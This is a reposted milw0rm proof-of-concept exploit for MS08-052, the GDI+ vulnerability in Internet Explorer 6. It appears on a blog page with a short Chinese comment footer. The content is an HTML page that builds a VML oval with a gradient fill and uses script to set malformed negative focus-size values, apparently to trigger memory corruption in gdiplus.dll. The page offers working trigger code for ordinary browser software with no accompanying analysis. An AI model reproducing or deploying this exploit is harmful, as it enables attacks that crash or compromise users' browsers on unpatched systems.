MS Internet Explorer GDI+ Proof of Concept (MS08-052)

<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
————————————————
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180

Credit:
John Smith,
Evil Fingers

Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>

<XML:NAMESPACE ns=”urn:schemas-microsoft-com:vml” prefix=”ef”>

<ef:oval style=’left: 500; top: 500; width: 500px; height: 500px;’ fill=”true” id=’ef_oval’>
<ef:fill type=”gradientCenter”;></ef:fill>
</ef:oval>

<script>
var focus_size = “-5, -4”;
var focus_pos = “.1, .1”;
var ef_oval = document.getElementById(‘ef_oval’);

ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>

# milw0rm.com [2008-09-28]

相关日志

楼被抢了 5 层了... 抢座Rss 2.0或者 Trackback

发表评论